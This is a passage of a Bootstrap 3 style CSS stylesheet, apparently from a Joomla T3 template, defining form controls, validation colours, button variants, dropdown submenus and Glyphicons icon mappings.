  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
}
input[type="radio"],
input[type="checkbox"] {
  margin: 4px 0 0;
  margin-top: 1px \9;
  line-height: normal;
}
input[type="file"] {
  display: block;
}
input[type="range"] {
  display: block;
  width: 100%;
}
select[multiple],
select[size] {
  height: auto;
}
input[type="file"]:focus,
input[type="radio"]:focus,
input[type="checkbox"]:focus {
  outline: thin dotted;
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
output {
  display: block;
  padding-top: 7px;
  font-size: 14px;
  line-height: 1.42857143;
  color: #666666;
}
.form-control {
  display: block;
  width: 100%;
  height: 34px;
  padding: 6px 12px;
  font-size: 14px;
  line-height: 1.42857143;
  color: #666666;
  background-color: #ffffff;
  background-image: none;
  border: 1px solid #cccccc;
  border-radius: 0px;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  -webkit-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  -o-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
}
.form-control:focus {
  border-color: #66afe9;
  outline: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102, 175, 233, 0.6);
  box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102, 175, 233, 0.6);
}
.form-control::-moz-placeholder {
  color: #999999;
  opacity: 1;
}
.form-control:-ms-input-placeholder {
  color: #999999;
}
.form-control::-webkit-input-placeholder {
  color: #999999;
}
.form-control[disabled],
.form-control[readonly],
fieldset[disabled] .form-control {
  background-color: #eeeeee;
  opacity: 1;
}
.form-control[disabled],
fieldset[disabled] .form-control {
  cursor: not-allowed;
}
textarea.form-control {
  height: auto;
}
input[type="search"] {
  -webkit-appearance: none;
}
@media screen and (-webkit-min-device-pixel-ratio: 0) {
  input[type="date"],
  input[type="time"],
  input[type="datetime-local"],
  input[type="month"] {
    line-height: 34px;
  }
  input[type="date"].input-sm,
  input[type="time"].input-sm,
  input[type="datetime-local"].input-sm,
  input[type="month"].input-sm,
  .input-group-sm input[type="date"],
  .input-group-sm input[type="time"],
  .input-group-sm input[type="datetime-local"],
  .input-group-sm input[type="month"] {
    line-height: 30px;
  }
  input[type="date"].input-lg,
  input[type="time"].input-lg,
  input[type="datetime-local"].input-lg,
  input[type="month"].input-lg,
  .input-group-lg input[type="date"],
  .input-group-lg input[type="time"],
  .input-group-lg input[type="datetime-local"],
  .input-group-lg input[type="month"] {
    line-height: 45px;
  }
}
.form-group {
  margin-bottom: 15px;
}
.radio,
.checkbox {
  position: relative;
  display: block;
  margin-top: 10px;
  margin-bottom: 10px;
}
.radio label,
.checkbox label {
  min-height: 20px;
  padding-left: 20px;
  margin-bottom: 0;
  font-weight: normal;
  cursor: pointer;
}
.radio input[type="radio"],
.radio-inline input[type="radio"],
.checkbox input[type="checkbox"],
.checkbox-inline input[type="checkbox"] {
  position: absolute;
  margin-left: -20px;
  margin-top: 4px \9;
}
.radio + .radio,
.checkbox + .checkbox {
  margin-top: -5px;
}
.radio-inline,
.checkbox-inline {
  position: relative;
  display: inline-block;
  padding-left: 20px;
  margin-bottom: 0;
  vertical-align: middle;
  font-weight: normal;
  cursor: pointer;
}
.radio-inline + .radio-inline,
.checkbox-inline + .checkbox-inline {
  margin-top: 0;
  margin-left: 10px;
}
input[type="radio"][disabled],
input[type="checkbox"][disabled],
input[type="radio"].disabled,
input[type="checkbox"].disabled,
fieldset[disabled] input[type="radio"],
fieldset[disabled] input[type="checkbox"] {
  cursor: not-allowed;
}
.radio-inline.disabled,
.checkbox-inline.disabled,
fieldset[disabled] .radio-inline,
fieldset[disabled] .checkbox-inline {
  cursor: not-allowed;
}
.radio.disabled label,
.checkbox.disabled label,
fieldset[disabled] .radio label,
fieldset[disabled] .checkbox label {
  cursor: not-allowed;
}
.form-control-static {
  padding-top: 7px;
  padding-bottom: 7px;
  margin-bottom: 0;
  min-height: 34px;
}
.form-control-static.input-lg,
.form-control-static.input-sm {
  padding-left: 0;
  padding-right: 0;
}
.input-sm {
  height: 30px;
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0px;
}
select.input-sm {
  height: 30px;
  line-height: 30px;
}
textarea.input-sm,
select[multiple].input-sm {
  height: auto;
}
.form-group-sm .form-control {
  height: 30px;
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0px;
}
select.form-group-sm .form-control {
  height: 30px;
  line-height: 30px;
}
textarea.form-group-sm .form-control,
select[multiple].form-group-sm .form-control {
  height: auto;
}
.form-group-sm .form-control-static {
  height: 30px;
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  min-height: 32px;
}
.input-lg {
  height: 45px;
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 0px;
}
select.input-lg {
  height: 45px;
  line-height: 45px;
}
textarea.input-lg,
select[multiple].input-lg {
  height: auto;
}
.form-group-lg .form-control {
  height: 45px;
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 0px;
}
select.form-group-lg .form-control {
  height: 45px;
  line-height: 45px;
}
textarea.form-group-lg .form-control,
select[multiple].form-group-lg .form-control {
  height: auto;
}
.form-group-lg .form-control-static {
  height: 45px;
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  min-height: 38px;
}
.has-feedback {
  position: relative;
}
.has-feedback .form-control {
  padding-right: 42.5px;
}
.form-control-feedback {
  position: absolute;
  top: 0;
  right: 0;
  z-index: 2;
  display: block;
  width: 34px;
  height: 34px;
  line-height: 34px;
  text-align: center;
  pointer-events: none;
}
.input-lg + .form-control-feedback {
  width: 45px;
  height: 45px;
  line-height: 45px;
}
.input-sm + .form-control-feedback {
  width: 30px;
  height: 30px;
  line-height: 30px;
}
.has-success .help-block,
.has-success .control-label,
.has-success .radio,
.has-success .checkbox,
.has-success .radio-inline,
.has-success .checkbox-inline,
.has-success.radio label,
.has-success.checkbox label,
.has-success.radio-inline label,
.has-success.checkbox-inline label {
  color: #468847;
}
.has-success .form-control {
  border-color: #468847;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
}
.has-success .form-control:focus {
  border-color: #356635;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #7aba7b;
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #7aba7b;
}
.has-success .input-group-addon {
  color: #468847;
  border-color: #468847;
  background-color: #dff0d8;
}
.has-success .form-control-feedback {
  color: #468847;
}
.has-warning .help-block,
.has-warning .control-label,
.has-warning .radio,
.has-warning .checkbox,
.has-warning .radio-inline,
.has-warning .checkbox-inline,
.has-warning.radio label,
.has-warning.checkbox label,
.has-warning.radio-inline label,
.has-warning.checkbox-inline label {
  color: #c09853;
}
.has-warning .form-control {
  border-color: #c09853;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
}
.has-warning .form-control:focus {
  border-color: #a47e3c;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #dbc59e;
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #dbc59e;
}
.has-warning .input-group-addon {
  color: #c09853;
  border-color: #c09853;
  background-color: #fcf8e3;
}
.has-warning .form-control-feedback {
  color: #c09853;
}
.has-error .help-block,
.has-error .control-label,
.has-error .radio,
.has-error .checkbox,
.has-error .radio-inline,
.has-error .checkbox-inline,
.has-error.radio label,
.has-error.checkbox label,
.has-error.radio-inline label,
.has-error.checkbox-inline label {
  color: #b94a48;
}
.has-error .form-control {
  border-color: #b94a48;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
}
.has-error .form-control:focus {
  border-color: #953b39;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #d59392;
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #d59392;
}
.has-error .input-group-addon {
  color: #b94a48;
  border-color: #b94a48;
  background-color: #f2dede;
}
.has-error .form-control-feedback {
  color: #b94a48;
}
.has-feedback label ~ .form-control-feedback {
  top: 25px;
}
.has-feedback label.sr-only ~ .form-control-feedback {
  top: 0;
}
.help-block {
  display: block;
  margin-top: 5px;
  margin-bottom: 10px;
  color: #848484;
}
@media (min-width: 768px) {
  .form-inline .form-group {
    display: inline-block;
    margin-bottom: 0;
    vertical-align: middle;
  }
  .form-inline .form-control {
    display: inline-block;
    width: auto;
    vertical-align: middle;
  }
  .form-inline .form-control-static {
    display: inline-block;
  }
  .form-inline .input-group {
    display: inline-table;
    vertical-align: middle;
  }
  .form-inline .input-group .input-group-addon,
  .form-inline .input-group .input-group-btn,
  .form-inline .input-group .form-control {
    width: auto;
  }
  .form-inline .input-group > .form-control {
    width: 100%;
  }
  .form-inline .control-label {
    margin-bottom: 0;
    vertical-align: middle;
  }
  .form-inline .radio,
  .form-inline .checkbox {
    display: inline-block;
    margin-top: 0;
    margin-bottom: 0;
    vertical-align: middle;
  }
  .form-inline .radio label,
  .form-inline .checkbox label {
    padding-left: 0;
  }
  .form-inline .radio input[type="radio"],
  .form-inline .checkbox input[type="checkbox"] {
    position: relative;
    margin-left: 0;
  }
  .form-inline .has-feedback .form-control-feedback {
    top: 0;
  }
}
.form-horizontal .radio,
.form-horizontal .checkbox,
.form-horizontal .radio-inline,
.form-horizontal .checkbox-inline {
  margin-top: 0;
  margin-bottom: 0;
  padding-top: 7px;
}
.form-horizontal .radio,
.form-horizontal .checkbox {
  min-height: 27px;
}
.form-horizontal .form-group {
  margin-left: -15px;
  margin-right: -15px;
}
@media (min-width: 768px) {
  .form-horizontal .control-label {
    text-align: right;
    margin-bottom: 0;
    padding-top: 7px;
  }
}
.form-horizontal .has-feedback .form-control-feedback {
  right: 15px;
}
@media (min-width: 768px) {
  .form-horizontal .form-group-lg .control-label {
    padding-top: 14.3px;
  }
}
@media (min-width: 768px) {
  .form-horizontal .form-group-sm .control-label {
    padding-top: 6px;
  }
}
.btn {
  display: inline-block;
  margin-bottom: 0;
  font-weight: normal;
  text-align: center;
  vertical-align: middle;
  touch-action: manipulation;
  cursor: pointer;
  background-image: none;
  border: 1px solid transparent;
  white-space: nowrap;
  padding: 6px 12px;
  font-size: 14px;
  line-height: 1.42857143;
  border-radius: 0px;
  -webkit-user-select: none;
  -moz-user-select: none;
  -ms-user-select: none;
  user-select: none;
}
.btn:focus,
.btn:active:focus,
.btn.active:focus,
.btn.focus,
.btn:active.focus,
.btn.active.focus {
  outline: thin dotted;
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
.btn:hover,
.btn:focus,
.btn.focus {
  color: #333333;
  text-decoration: none;
}
.btn:active,
.btn.active {
  outline: 0;
  background-image: none;
  -webkit-box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
  box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
}
.btn.disabled,
.btn[disabled],
fieldset[disabled] .btn {
  cursor: not-allowed;
  pointer-events: none;
  opacity: 0.65;
  filter: alpha(opacity=65);
  -webkit-box-shadow: none;
  box-shadow: none;
}
.btn-default {
  color: #333333;
  background-color: #ffffff;
  border-color: #cccccc;
}
.btn-default:hover,
.btn-default:focus,
.btn-default.focus,
.btn-default:active,
.btn-default.active,
.open > .dropdown-toggle.btn-default {
  color: #333333;
  background-color: #e6e6e6;
  border-color: #adadad;
}
.btn-default:active,
.btn-default.active,
.open > .dropdown-toggle.btn-default {
  background-image: none;
}
.btn-default.disabled,
.btn-default[disabled],
fieldset[disabled] .btn-default,
.btn-default.disabled:hover,
.btn-default[disabled]:hover,
fieldset[disabled] .btn-default:hover,
.btn-default.disabled:focus,
.btn-default[disabled]:focus,
fieldset[disabled] .btn-default:focus,
.btn-default.disabled.focus,
.btn-default[disabled].focus,
fieldset[disabled] .btn-default.focus,
.btn-default.disabled:active,
.btn-default[disabled]:active,
fieldset[disabled] .btn-default:active,
.btn-default.disabled.active,
.btn-default[disabled].active,
fieldset[disabled] .btn-default.active {
  background-color: #ffffff;
  border-color: #cccccc;
}
.btn-default .badge {
  color: #ffffff;
  background-color: #333333;
}
.btn-primary {
  color: #ffffff;
  background-color: #db00af;
  border-color: #c2009b;
}
.btn-primary:hover,
.btn-primary:focus,
.btn-primary.focus,
.btn-primary:active,
.btn-primary.active,
.open > .dropdown-toggle.btn-primary {
  color: #ffffff;
  background-color: #a80086;
  border-color: #84006a;
}
.btn-primary:active,
.btn-primary.active,
.open > .dropdown-toggle.btn-primary {
  background-image: none;
}
.btn-primary.disabled,
.btn-primary[disabled],
fieldset[disabled] .btn-primary,
.btn-primary.disabled:hover,
.btn-primary[disabled]:hover,
fieldset[disabled] .btn-primary:hover,
.btn-primary.disabled:focus,
.btn-primary[disabled]:focus,
fieldset[disabled] .btn-primary:focus,
.btn-primary.disabled.focus,
.btn-primary[disabled].focus,
fieldset[disabled] .btn-primary.focus,
.btn-primary.disabled:active,
.btn-primary[disabled]:active,
fieldset[disabled] .btn-primary:active,
.btn-primary.disabled.active,
.btn-primary[disabled].active,
fieldset[disabled] .btn-primary.active {
  background-color: #db00af;
  border-color: #c2009b;
}
.btn-primary .badge {
  color: #db00af;
  background-color: #ffffff;
}
.btn-success {
  color: #ffffff;
  background-color: #3e9b52;
  border-color: #378948;
}
.btn-success:hover,
.btn-success:focus,
.btn-success.focus,
.btn-success:active,
.btn-success.active,
.open > .dropdown-toggle.btn-success {
  color: #ffffff;
  background-color: #2f773f;
  border-color: #255d31;
}
.btn-success:active,
.btn-success.active,
.open > .dropdown-toggle.btn-success {
  background-image: none;
}
.btn-success.disabled,
.btn-success[disabled],
fieldset[disabled] .btn-success,
.btn-success.disabled:hover,
.btn-success[disabled]:hover,
fieldset[disabled] .btn-success:hover,
.btn-success.disabled:focus,
.btn-success[disabled]:focus,
fieldset[disabled] .btn-success:focus,
.btn-success.disabled.focus,
.btn-success[disabled].focus,
fieldset[disabled] .btn-success.focus,
.btn-success.disabled:active,
.btn-success[disabled]:active,
fieldset[disabled] .btn-success:active,
.btn-success.disabled.active,
.btn-success[disabled].active,
fieldset[disabled] .btn-success.active {
  background-color: #3e9b52;
  border-color: #378948;
}
.btn-success .badge {
  color: #3e9b52;
  background-color: #ffffff;
}
.btn-info {
  color: #ffffff;
  background-color: #0099cc;
  border-color: #0086b3;
}
.btn-info:hover,
.btn-info:focus,
.btn-info.focus,
.btn-info:active,
.btn-info.active,
.open > .dropdown-toggle.btn-info {
  color: #ffffff;
  background-color: #007399;
  border-color: #005875;
}
.btn-info:active,
.btn-info.active,
.open > .dropdown-toggle.btn-info {
  background-image: none;
}
.btn-info.disabled,
.btn-info[disabled],
fieldset[disabled] .btn-info,
.btn-info.disabled:hover,
.btn-info[disabled]:hover,
fieldset[disabled] .btn-info:hover,
.btn-info.disabled:focus,
.btn-info[disabled]:focus,
fieldset[disabled] .btn-info:focus,
.btn-info.disabled.focus,
.btn-info[disabled].focus,
fieldset[disabled] .btn-info.focus,
.btn-info.disabled:active,
.btn-info[disabled]:active,
fieldset[disabled] .btn-info:active,
.btn-info.disabled.active,
.btn-info[disabled].active,
fieldset[disabled] .btn-info.active {
  background-color: #0099cc;
  border-color: #0086b3;
}
.btn-info .badge {
  color: #0099cc;
  background-color: #ffffff;
}
.btn-warning {
  color: #ffffff;
  background-color: #ff8800;
  border-color: #e67a00;
}
.btn-warning:hover,
.btn-warning:focus,
.btn-warning.focus,
.btn-warning:active,
.btn-warning.active,
.open > .dropdown-toggle.btn-warning {
  color: #ffffff;
  background-color: #cc6d00;
  border-color: #a85a00;
}
.btn-warning:active,
.btn-warning.active,
.open > .dropdown-toggle.btn-warning {
  background-image: none;
}
.btn-warning.disabled,
.btn-warning[disabled],
fieldset[disabled] .btn-warning,
.btn-warning.disabled:hover,
.btn-warning[disabled]:hover,
fieldset[disabled] .btn-warning:hover,
.btn-warning.disabled:focus,
.btn-warning[disabled]:focus,
fieldset[disabled] .btn-warning:focus,
.btn-warning.disabled.focus,
.btn-warning[disabled].focus,
fieldset[disabled] .btn-warning.focus,
.btn-warning.disabled:active,
.btn-warning[disabled]:active,
fieldset[disabled] .btn-warning:active,
.btn-warning.disabled.active,
.btn-warning[disabled].active,
fieldset[disabled] .btn-warning.active {
  background-color: #ff8800;
  border-color: #e67a00;
}
.btn-warning .badge {
  color: #ff8800;
  background-color: #ffffff;
}
.btn-danger {
  color: #ffffff;
  background-color: #cc0000;
  border-color: #b30000;
}
.btn-danger:hover,
.btn-danger:focus,
.btn-danger.focus,
.btn-danger:active,
.btn-danger.active,
.open > .dropdown-toggle.btn-danger {
  color: #ffffff;
  background-color: #990000;
  border-color: #750000;
}
.btn-danger:active,
.btn-danger.active,
.open > .dropdown-toggle.btn-danger {
  background-image: none;
}
.btn-danger.disabled,
.btn-danger[disabled],
fieldset[disabled] .btn-danger,
.btn-danger.disabled:hover,
.btn-danger[disabled]:hover,
fieldset[disabled] .btn-danger:hover,
.btn-danger.disabled:focus,
.btn-danger[disabled]:focus,
fieldset[disabled] .btn-danger:focus,
.btn-danger.disabled.focus,
.btn-danger[disabled].focus,
fieldset[disabled] .btn-danger.focus,
.btn-danger.disabled:active,
.btn-danger[disabled]:active,
fieldset[disabled] .btn-danger:active,
.btn-danger.disabled.active,
.btn-danger[disabled].active,
fieldset[disabled] .btn-danger.active {
  background-color: #cc0000;
  border-color: #b30000;
}
.btn-danger .badge {
  color: #cc0000;
  background-color: #ffffff;
}
.btn-link {
  color: #db00af;
  font-weight: normal;
  border-radius: 0;
}
.btn-link,
.btn-link:active,
.btn-link.active,
.btn-link[disabled],
fieldset[disabled] .btn-link {
  background-color: transparent;
  -webkit-box-shadow: none;
  box-shadow: none;
}
.btn-link,
.btn-link:hover,
.btn-link:focus,
.btn-link:active {
  border-color: transparent;
}
.btn-link:hover,
.btn-link:focus {
  color: #8f0072;
  text-decoration: underline;
  background-color: transparent;
}
.btn-link[disabled]:hover,
fieldset[disabled] .btn-link:hover,
.btn-link[disabled]:focus,
fieldset[disabled] .btn-link:focus {
  color: #999999;
  text-decoration: none;
}
.btn-lg,
.btn-group-lg > .btn {
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 0px;
}
.btn-sm,
.btn-group-sm > .btn {
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0px;
}
.btn-xs,
.btn-group-xs > .btn {
  padding: 1px 5px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0px;
}
.btn-block {
  display: block;
  width: 100%;
}
.btn-block + .btn-block {
  margin-top: 5px;
}
input[type="submit"].btn-block,
input[type="reset"].btn-block,
input[type="button"].btn-block {
  width: 100%;
}
.dropdown-submenu {
  position: relative;
}
.dropdown-submenu > .dropdown-menu {
  top: 0;
  left: 100%;
  margin-top: -5px;
  margin-left: -1px;
}
.dropdown-submenu.open > .dropdown-menu {
  display: block;
}
.dropdown-submenu > .dropdown-menu {
  border-radius: 0px;
}
.dropdown-submenu > a:after {
  display: block;
  content: " ";
  float: right;
  width: 0;
  height: 0;
  border-color: transparent;
  border-style: solid;
  border-width: 5px 0 5px 5px;
  border-left-color: #111111;
  margin-top: 5px;
  margin-right: -5px;
}
.dropdown-submenu.open > a:after {
  border-left-color: #ffffff;
}

.fade {
  opacity: 0;
  -webkit-transition: opacity 0.15s linear;
  -o-transition: opacity 0.15s linear;
  transition: opacity 0.15s linear;
}
.fade.in {
  opacity: 1;
}
.collapse {
  display: none;
}
.collapse.in {
  display: block;
}
tr.collapse.in {
  display: table-row;
}
tbody.collapse.in {
  display: table-row-group;
}
.collapsing {
  position: relative;
  height: 0;
  overflow: hidden;
  -webkit-transition-property: height, visibility;
  transition-property: height, visibility;
  -webkit-transition-duration: 0.35s;
  transition-duration: 0.35s;
  -webkit-transition-timing-function: ease;
  transition-timing-function: ease;
}
@font-face {
  font-family: 'Glyphicons Halflings';
  src: url('../../../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.eot');
  src: url('../../../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.eot?#iefix') format('embedded-opentype'), url('../../../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.woff2') format('woff2'), url('../../../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.woff') format('woff'), url('../../../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.ttf') format('truetype'), url('../../../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.svg#glyphicons_halflingsregular') format('svg');
}
.glyphicon {
  position: relative;
  top: 1px;
  display: inline-block;
  font-family: 'Glyphicons Halflings';
  font-style: normal;
  font-weight: normal;
  line-height: 1;
  -webkit-font-smoothing: antialiased;
  -moz-osx-font-smoothing: grayscale;
}
.glyphicon-asterisk:before {
  content: "\2a";
}
.glyphicon-plus:before {
  content: "\2b";
}
.glyphicon-euro:before,
.glyphicon-eur:before {
  content: "\20ac";
}
.glyphicon-minus:before {
  content: "\2212";
}
.glyphicon-cloud:before {
  content: "\2601";
}
.glyphicon-envelope:before {
  content: "\2709";
}
.glyphicon-pencil:before {
  content: "\270f";
}
.glyphicon-glass:before {
  content: "\e001";
}
.glyphicon-music:before {
  content: "\e002";
}
.glyphicon-search:before {
  content: "\e003";
}
.glyphicon-heart:before {
  content: "\e005";
}
.glyphicon-star:before {
  content: "\e006";
}
.glyphicon-star-empty:before {
  content: "\e007";
}
.glyphicon-user:before {
  content: "\e008";
}
.glyphicon-film:before {
  content: "\e009";
}
.glyphicon-th-large:before {
  content: "\e010";
}
.glyphicon-th:before {
  content: "\e011";
}
.glyphicon-th-list:before {
  content: "\e012";
}
.glyphicon-ok:before {
  content: "\e013";
}
.glyphicon-remove:before {
  content: "\e014";
}
.glyphicon-zoom-in:before {
  content: "\e015";
}
.glyphicon-zoom-out:before {
  content: "\e016";
}
.glyphicon-off:before {
  content: "\e017";
}
.glyphicon-signal:before {
  content: "\e018";
}
.glyphicon-cog:before {
  content: "\e019";
}
.glyphicon-trash:before {
  content: "\e020";
}
.glyphicon-home:before {
  content: "\e021";
}
.glyphicon-file:before {
  content: "\e022";
}
.glyphicon-time:before {
  content: "\e023";
}
.glyphicon-road:before {
  content: "\e024";
}
.glyphicon-download-alt:before {
  content: "\e025";
}
.glyphicon-download:before {
  content: "\e026";
}
.glyphicon-upload:before {
  content: "\e027";
}
.glyphicon-inbox:before {
  content: "\e028";
}
.glyphicon-play-circle:before {
  content: "\e029";
}
.glyphicon-repeat:before {
  content: "\e030";
}
.glyphicon-refresh:before {
  content: "\e031";
}
.glyphicon-list-alt:before {
  content: "\e032";
}
.glyphicon-lock:before {
  content: "\e033";
}
.glyphicon-flag:before {
  content: "\e034";
}
.glyphicon-headphones:before {
  content: "\e035";
}
.glyphicon-volume-off:before {
  content: "\e036";
}
.glyphicon-volume-down:before {
  content: "\e037";
}
.glyphicon-volume-up:before {
  content: "\e038";
}
.glyphicon-qrcode:before {
  content: "\e039";
}
.glyphicon-barcode:before {
  content: "\e040";
}
.glyphicon-tag:before {
  content: "\e041";
}
.glyphicon-tags:before {
  content: "\e042";
}
.glyphicon-book:before {
  content: "\e043";
}
.glyphicon-bookmark:before {
  content: "\e044";
}
.glyphicon-print:before {
  content: "\e045";
}
.glyphicon-camera:before {
  content: "\e046";
}
.glyphicon-font:before {
  content: "\e047";
}
.glyphicon-bold:before {
  content: "\e048";
}
.glyphicon-italic:before {
  content: "\e049";
}
.glyphicon-text-height:before {
  content: "\e050";
}
.glyphicon-text-width:before {
  content: "\e051";
}
.glyphicon-align-left:before {
  content: "\e052";
}
.glyphicon-align-center:before {
  content: "\e053";
}
.glyphicon-align-right:before {
  content: "\e054";
}
.glyphicon-align-justify:before {
  content: "\e055";
}
.glyphicon-list:before {
  content: "\e056";
}
.glyphicon-indent-left:before {
  content: "\e057";
}
.glyphicon-indent-right:before {
  content: "\e058";
}
.glyphicon-facetime-video:before {
  content: "\e059";
}
.glyphicon-picture:before {
  content: "\e060";
}
.glyphicon-map-marker:before {
  content: "\e062";
}
.glyphicon-adjust:before {
  content: "\e063";
}
.glyphicon-tint:before {
  content: "\e064";
}
.glyphicon-edit:before {
  content: "\e065";
}
.glyphicon-share:before {
  content: "\e066";
}
.glyphicon-check:before {
  content: "\e067";
}
.glyphicon-move:before {
  content: "\e068";
}
.glyphicon-step-backward:before {
  content: "\e069";
}
.glyphicon-fast-backward:before {
  content: "\e070";
}
.glyphicon-backward:before {
  content: "\e071";
}
.glyphicon-play:before {
  content: "\e072";
}
.glyphicon-pause:before {
  content: "\e073";
}
.glyphicon-stop:before {
  content: "\e074";
}
.glyphicon-forward:before {
  content: "\e075";
}
.glyphicon-fast-forward:before {
  content: "\e076";
}
.glyphicon-step-forward:before {
  content: "\e077";
}
.glyphicon-eject:before {
  content: "\e078";
}
.glyphicon-chevron-left:before {
  content: "\e079";
}
.glyphicon-chevron-right:before {
  content: "\e080";
}
.glyphicon-plus-sign:before {
  content: "\e081";
}
.glyphicon-minus-sign:before {
  content: "\e082";
}
.glyphicon-remove-sign:before {
  content: "\e083";
}
.glyphicon-ok-sign:before {
  content: "\e084";
}
.glyphicon-question-sign:before {
  content: "\e085";
}
.glyphicon-info-sign:before {
  content: "\e086";
}
.glyphicon-screenshot:before {
  content: "\e087";
}
.glyphicon-remove-circle:before {
  content: "\e088";
}
.glyphicon-ok-circle:before {
  content: "\e089";
}
.glyphicon-ban-circle:before {
  content: "\e090";
}
.glyphicon-arrow-left:before {
  content: "\e091";
}
.glyphicon-arrow-right:before {
  content: "\e092";
}
.glyphicon-arrow-up:before {
  content: "\e093";
}
.glyphicon-arrow-down:before {
  content: "\e094";
}
.glyphicon-share-alt:before {
  content: "\e095";
}
.glyphicon-resize-full:before {
  content: "\e096";
}
.glyphicon-resize-small:before {
  content: "\e097";
}
.glyphicon-exclamation-sign:before {
  content: "\e101";
}
.glyphicon-gift:before {
  content: "\e102";
}
.glyphicon-leaf:before {
  content: "\e103";
}
.glyphicon-fire:before {
  content: "\e104";
}
.glyphicon-eye-open:before {
  content: "\e105";
}
.glyphicon-eye-close:before {
  content: "\e106";
}
.glyphicon-warning-sign:before {
  content: "\e107";
}
.glyphicon-plane:before {
  content: "\e108";
}
.glyphicon-calendar:before {
  content: "\e109";
}
.glyphicon-random:before {
  content: "\e110";
}
.glyphicon-comment:before {
  content: "\e111";
}
.glyphicon-magnet:before {
  content: "\e112";
}
.glyphicon-chevron-up:before {
  content: "\e113";
}
.glyphicon-chevron-down:before {
  content: "\e114";
}
.glyphicon-retweet:before {
  content: "\e115";
}
.glyphicon-shopping-cart:before {
  content: "\e116";
}
.glyphicon-folder-close:before {
  content: "\e117";
}
.glyphicon-folder-open:before {
  content: "\e118";
}
.glyphicon-resize-vertical:before {
  content: "\e119";
}
.glyphicon-resize-horizontal:before {
  content: "\e120";
}
.glyphicon-hdd:before {
  content: "\e121";
}
.glyphicon-bullhorn:before {
  content: "\e122";
}
.glyphicon-bell:before {
  content: "\e123";
}
.glyphicon-certificate:before {
  content: "\e124";
}
.glyphicon-thumbs-up:before {
  content: "\e125";
}
.glyphicon-thumbs-down:before {
  content: "\e126";
}
.glyphicon-hand-right:before {
  content: "\e127";
}
.glyphicon-hand-left:before {
  content: "\e128";
}
.glyphicon-hand-up:before {
  content: "\e129";
}
.glyphicon-hand-down:before {
  content: "\e130";
}
.glyphicon-circle-arrow-right:before {
  content: "\e131";
}
.glyphicon-circle-arrow-left:before {
  content: "\e132";
}
.glyphicon-circle-arrow-up:before {
  content: "\e133";
}
.glyphicon-circle-arrow-down:before {
  content: "\e134";
}
.glyphicon-globe:before {
  content: "\e135";
}
.glyphicon-wrench:before {
  content: "\e136";
}
.glyphicon-tasks:before {
  content: "\e137";
}
.glyphicon-filter:before {
  content: "\e138";
}
.glyphicon-briefcase:before {
  content: "\e139";
}
.glyphicon-fullscreen:before {
  content: "\e140";
}
.glyphicon-dashboard:before {
  content: "\e141";
}
.glyphicon-paperclip:before {
  content: "\e142";
}
.glyphicon-heart-empty:before {
  content: "\e143";
}
.glyphicon-link:before {
  content: "\e144";
}
.glyphicon-phone:before {
  content: "\e145";
}
.glyphicon-pushpin:before {
  content: "\e146";
}
.glyphicon-usd:before {
  content: "\e148";
}
.glyphicon-gbp:before {
  content: "\e149";
}
.glyphicon-sort:before {
  content: "\e150";
}
.glyphicon-sort-by-alphabet:before {
  content: "\e151";
}
.glyphicon-sort-by-alphabet-alt:before {
  content: "\e152";
}
.glyphicon-sort-by-order:before {
  content: "\e153";
}
.glyphicon-sort-by-order-alt:before {
  content: "\e154";
}
.glyphicon-sort-by-attributes:before {
  content: "\e155";
}
.glyphicon-sort-by-attributes-alt:before {
  content: "\e156";
}
.glyphicon-unchecked:before {
  content: "\e157";
}
.glyphicon-expand:before {
  content: "\e158";
}
.glyphicon-collapse-down:before {
  content: "\e159";
}
.glyphicon-collapse-up:before {
  content: "\e160";
}
.glyphicon-log-in:before {
  content: "\e161";
}
.glyphicon-flash:before {
  content: "\e162";
}
.glyphicon-log-out:before {
  content: "\e163";
}
.glyphicon-new-window:before {
  content: "\e164";
}
.glyphicon-record:before {
